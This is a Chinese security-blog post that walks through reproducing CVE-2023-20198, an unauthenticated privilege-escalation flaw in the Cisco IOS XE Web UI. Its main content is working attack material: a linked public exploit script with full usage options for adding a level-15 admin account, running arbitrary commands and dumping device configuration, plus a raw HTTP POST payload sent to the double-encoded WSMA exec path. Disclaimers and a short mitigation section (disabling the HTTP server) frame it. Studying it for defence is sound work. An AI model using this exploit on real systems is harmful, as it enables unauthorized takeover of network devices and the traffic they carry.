漏洞复现 Cisco IOS XE Web UI 权限提升漏洞复现(CVE-2023-20198)

admin 2024年7月8日11:44:47评论246 views字数 2454阅读8分10秒阅读模式
01 概述

CVE-2023-20198存在于Cisco IOS XE软件的Web UI(Web User Interface)中,这是一个基于GUI的嵌入式系统管理工具,用于系统配置、监控和故障排除。该漏洞允许未经身份验证的远程攻击者在受影响的系统上创建具有Level 15访问权限的账户。
02 正文

漏洞类型:权限提升漏洞
影响范围:所有启用了Web UI功能的Cisco IOS XE设备
漏洞影响:该漏洞允许未经身份验证的远程攻击者在受影响的系统上创建具有Level 15访问权限的账户。Level 15是Cisco IOS系统上的最高权限级别,允许执行所有命令,包括重新加载系统和进行配置更改。
利用方式:攻击者可以通过Web UI中的漏洞,在受影响的设备上创建具有最高权限的账户,进而控制整个设备并执行任意命令。
网站样式

漏洞复现 Cisco IOS XE Web UI 权限提升漏洞复现(CVE-2023-20198)

利用脚本

https://github.com/smokeintheshell/CVE-2023-20198
用法
usage: exploit.py [-h] (-t targetIP | -l targetFile) [-https] (-c | -g | -e command | -a | -d) [-u newUserName] [-p newUserPass] [-o outputFile] [-v]CVE-2023-20198 Exploit PoCoptions:  -h, --help      show this help message and exit  -t targetIP     Target IP Address  -l targetFile   File containing IP Addresses (-c only)  -https          Use https  -c              [X] Check for vulnerability  -g              [X] Get Cisco IOS running config  -e command      [X] Execute Cisco IOS command  -a              [X] Add new priv 15 user  -d              [X] Remove priv 15 user  -u newUserName  [Optional] user name for -a or -d. Default: shellsmoke  -p newUserPass  [Optional] new user pass for -a. Default: pwned  -o outputFile   Write output to file  -v              Increase verbosity
复现过程:利用poc
POST /%2577eb%2575i_%2577sma_Http HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 723<?xml version="1.0"?> <SOAP:Envelope xmlns:SOAP="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <SOAP:Header> <wsse:Security xmlns:wsse="http://schemas.xmlsoap.org/ws/2002/04/secext"> <wsse:UsernameToken SOAP:mustUnderstand="false"> <wsse:Username>admin</wsse:Username><wsse:Password>*****</wsse:Password></wsse:UsernameToken></wsse:Security></SOAP:Header><SOAP:Body><request correlator="exec1" xmlns="urn:cisco:wsma-exec"> <execCLI xsd="false"><cmd>uname -a</cmd><dialogue><expect></expect><reply></reply></dialogue></execCLI></request></SOAP:Body></SOAP:Envelope>
比如说查看arp表,修改命令为 show ip arp

漏洞复现 Cisco IOS XE Web UI 权限提升漏洞复现(CVE-2023-20198)

脚本检测:
python3 exploit.py -t vul_ip -c 

漏洞复现 Cisco IOS XE Web UI 权限提升漏洞复现(CVE-2023-20198)

查看配置:
python3 exploit.py -t vul_ip -g

漏洞复现 Cisco IOS XE Web UI 权限提升漏洞复现(CVE-2023-20198)

03 修复方式

官方建议:
由于官方暂未发布安全版本,思科强烈建议客户在所有面向互联网的系统上禁用HTTP服务器功能(即Web UI),以防止该漏洞被利用。
具体操作:
管理员可以在全局配置模式下使用no ip http serverno ip http secure-server命令来禁用HTTP服务器功能。
声明

切勿利用文章内容中的相关技术从事非法测试,所有测试需获得合法授权。非法利用此文所提供的信息而造成的任何直接或者间接损失的,其后果均由使用者本人负责,造成影响与作者以及幽荧安全无关。

原文始发于微信公众号(幽荧安全):漏洞复现 Cisco IOS XE Web UI 权限提升漏洞复现(CVE-2023-20198)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月8日11:44:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现 Cisco IOS XE Web UI 权限提升漏洞复现(CVE-2023-20198)https://cn-sec.com/archives/2929639.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息